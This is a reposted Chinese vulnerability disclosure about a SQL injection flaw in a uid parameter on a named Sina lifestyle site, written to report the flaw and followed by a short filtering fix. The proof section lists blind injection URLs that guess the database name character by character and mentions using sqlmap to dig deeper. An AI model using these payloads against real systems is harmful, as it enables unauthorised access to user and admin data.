来源:自学PHP网 时间:2015-04-17 13:02 作者: 阅读:次
[导读] 注入漏洞存在地址为http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310其中该漏洞可以导致数据泄漏,其中泄漏的数据包括团购,优惠券、以及用户联系方式,smslog,团购商户、admin等数据。同...
注入漏洞存在地址为
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 其中该漏洞可以导致数据泄漏,其中泄漏的数据包括团购,优惠券、以及用户联系方式,smslog,团购商户、admin等数据。 同时,团购的商户登陆地址为 http://life.sina.com.cn/tuanadmin 漏洞证明:下面为手工猜解数据库名的语句为 http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and Length((database()))<5 http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=108 http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=105 http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=102 http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=101 下图为注入是返回对正确与错误的截图 注入返回对的情况截图 注入时返回错的情况截图 一下是使用sqlmap对注入点进行注入攻击,一下该例为查询数据库banner,通过改变命令参数可以对其进行更深入的攻击。 修复方案: 对其uid参数进行检查并且进行过滤。 作者 Insight-labs |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com